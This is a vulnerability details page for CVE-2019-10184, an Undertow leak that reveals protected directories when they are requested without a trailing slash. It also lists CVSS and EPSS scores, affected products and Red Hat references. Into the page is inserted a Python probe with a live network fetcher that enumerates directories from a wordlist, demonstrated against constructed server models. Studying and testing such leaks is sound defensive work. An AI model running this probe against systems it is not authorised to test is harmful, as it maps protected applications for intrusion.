Vulnerability Details : CVE-2019-10184
Undertow before version 2.0.23.Final is vulnerable to an information leak. A request for a protected directory that omits the trailing slash is handled before the security constraint is enforced, so the response reveals whether that directory exists and an unauthenticated client can map a web application's directory structure by probing candidate paths. The fix makes Undertow answer such requests with 401 Unauthorized (UNDERTOW-1578, pull request #794, listed in the references below).
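The probe below is an added example, not code from the advisory, from Red Hat, or from the Undertow project. It shows how the leak is detected: a wordlist of directory names is requested without trailing slashes, redirects are not followed, and a redirect to the slash-terminated path counts as a confirmed directory. It assumes, as an illustration, that an unpatched container sends that canonicalising redirect before the security constraint is evaluated, while a fixed build answers 401 first; the host `target.example`, the directory names and the two in-memory server models are constructed for the demo, and `http_fetch` is the network fetcher you would pass instead of a model against a real target you are authorised to test.

```python
"""Probe for the CVE-2019-10184 trailing-slash directory leak.

Added example; not code from the advisory or from Undertow. The two
in-memory "servers" built by make_server() are constructed stand-ins.
"""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Set, Tuple

# A fetcher performs one unauthenticated GET and returns
# (status, Location header or ""). It must not follow redirects,
# because the redirect itself is the leaked signal.
Fetcher = Callable[[str], Tuple[int, str]]

REDIRECTS = {301, 302, 303, 307, 308}


def classify(path: str, status: int, location: str) -> str:
    """Interpret the response to GET <path> (sent without a trailing slash).

    exists    : redirected to path + "/", i.e. the directory was revealed
    protected : 401/403 before anything about the path leaked
    absent    : 404
    other     : needs manual review (e.g. a redirect to a login page)
    """
    if status in REDIRECTS and location.endswith(path + "/"):
        return "exists"
    if status in (401, 403):
        return "protected"
    if status == 404:
        return "absent"
    return "other"


def enumerate_dirs(base_url: str, candidates: Iterable[str],
                   fetch: Fetcher) -> Dict[str, str]:
    """Probe each candidate directory name without a trailing slash."""
    results: Dict[str, str] = {}
    for name in candidates:
        path = "/" + name.strip("/")  # deliberately no trailing slash
        status, location = fetch(base_url.rstrip("/") + path)
        results[path] = classify(path, status, location)
    return results


def leaked_dirs(results: Dict[str, str]) -> List[str]:
    """Directories an unauthenticated prober was able to confirm."""
    return sorted(p for p, verdict in results.items() if verdict == "exists")


def http_fetch(url: str) -> Tuple[int, str]:
    """Network fetcher for a real target; redirects are reported, not followed."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # turn every 3xx into an HTTPError we can inspect

    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(url, timeout=10) as resp:
            return resp.status, resp.headers.get("Location", "") or ""
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location", "") or ""


def make_server(protected_dirs: Set[str], patched: bool) -> Fetcher:
    """Constructed model of a container's handling of unauthenticated GETs.

    Unpatched (assumed behaviour for the demo): the canonicalising redirect
    for a directory without a trailing slash is sent before the security
    constraint is evaluated. Patched: 401 comes first, as the fix requires.
    """
    def fetch(url: str) -> Tuple[int, str]:
        path = urllib.parse.urlsplit(url).path
        if path.rstrip("/") in protected_dirs:
            if not patched and not path.endswith("/"):
                return 302, url + "/"
            return 401, ""
        return 404, ""
    return fetch


def demo() -> Tuple[Dict[str, str], Dict[str, str]]:
    """Run one constructed wordlist against a vulnerable and a patched model."""
    dirs = {"/admin", "/reports"}              # constructed protected dirs
    wordlist = ["admin", "reports", "backup"]  # constructed guesses
    vulnerable = enumerate_dirs("http://target.example", wordlist,
                                make_server(dirs, patched=False))
    fixed = enumerate_dirs("http://target.example", wordlist,
                           make_server(dirs, patched=True))
    return vulnerable, fixed


if __name__ == "__main__":
    before, after = demo()
    print("unpatched:", before, "leaked:", leaked_dirs(before))
    print("patched:  ", after, "leaked:", leaked_dirs(after))
```

Against the unpatched model the two real directories come back as `exists` while the bad guess is `absent`, which is exactly the distinguishing signal the CVE describes; against the patched model the prober only sees `protected` and learns nothing it could not have learned from the security constraint itself. When using `http_fetch`, a redirect to a login page rather than to `path + "/"` is reported as `other` and should be inspected by hand rather than counted as a leak.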
Products affected by CVE-2019-10184
- cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.3:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:jboss_enterprise_application_platform:-:*:*:*:text-only:*:*:*
- cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.4:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:undertow:*:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:jboss_data_grid:-:*:*:*:text-only:*:*:*
- cpe:2.3:a:redhat:single_sign-on:-:*:*:*:text-only:*:*:*
- cpe:2.3:a:redhat:single_sign-on:7.3:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:openshift_application_runtimes:1.0:*:*:*:*:*:*:*
- cpe:2.3:a:redhat:openshift_application_runtimes:-:*:*:*:text-only:*:*:*
- cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*
- cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*
- cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*
Threat overview for CVE-2019-10184
- Top open port discovered on systems with this issue: 80
- IPs affected by CVE-2019-10184: 5,043
- Threat actors abusing this issue: Yes
Exploit prediction scoring system (EPSS) score for CVE-2019-10184
- EPSS score: 0.67% (probability of exploitation activity in the next 30 days)
- Percentile: ~80% (the proportion of vulnerabilities scored at or below this one)
CVSS scores for CVE-2019-10184
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N | 10.0 | 2.9 | NIST | |
5.3 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N | 3.9 | 1.4 | Red Hat, Inc. | |
7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 3.9 | 3.6 | NIST | |
CWE ids for CVE-2019-10184
- The product does not perform an authorization check when an actor attempts to access a resource or perform an action. Assigned by:
  - nvd@nist.gov (Primary)
  - secalert@redhat.com (Secondary)
References for CVE-2019-10184
- RHSA-2019:2998 - Security Advisory - Red Hat Customer Portal (Vendor Advisory): https://access.redhat.com/errata/RHSA-2019:2998
- RHSA-2019:3045 - Security Advisory - Red Hat Customer Portal (Vendor Advisory): https://access.redhat.com/errata/RHSA-2019:3045
- RHSA-2019:2936 - Security Advisory - Red Hat Customer Portal (Vendor Advisory): https://access.redhat.com/errata/RHSA-2019:2936
- RHSA-2019:3044 - Security Advisory - Red Hat Customer Portal (Vendor Advisory): https://access.redhat.com/errata/RHSA-2019:3044
- [UNDERTOW-1578] 401 Unauthorized should be returned when requesting a protected directory without trailing slash by gaol, Pull Request #794, undertow-io/undertow on GitHub (Patch; Third Party Advisory): https://github.com/undertow-io/undertow/pull/794
- CVE-2019-10184 Undertow Vulnerability in NetApp Products, NetApp Product Security (Third Party Advisory): https://security.netapp.com/advisory/ntap-20220210-0016/
- RHSA-2019:3050 - Security Advisory - Red Hat Customer Portal (Vendor Advisory): https://access.redhat.com/errata/RHSA-2019:3050
- RHSA-2019:2935 - Security Advisory - Red Hat Customer Portal (Vendor Advisory): https://access.redhat.com/errata/RHSA-2019:2935
- Bug 1713068 (CVE-2019-10184) undertow: Information leak in requests for directories without trailing slashes, Red Hat Bugzilla (Issue Tracking; Vendor Advisory): https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10184
- RHSA-2019:2937 - Security Advisory - Red Hat Customer Portal (Vendor Advisory): https://access.redhat.com/errata/RHSA-2019:2937
- RHSA-2019:3046 - Security Advisory - Red Hat Customer Portal (Vendor Advisory): https://access.redhat.com/errata/RHSA-2019:3046
- RHSA-2019:2938 - Security Advisory - Red Hat Customer Portal (Vendor Advisory): https://access.redhat.com/errata/RHSA-2019:2938
- RHSA-2020:0727 - Security Advisory - Red Hat Customer Portal (Vendor Advisory): https://access.redhat.com/errata/RHSA-2020:0727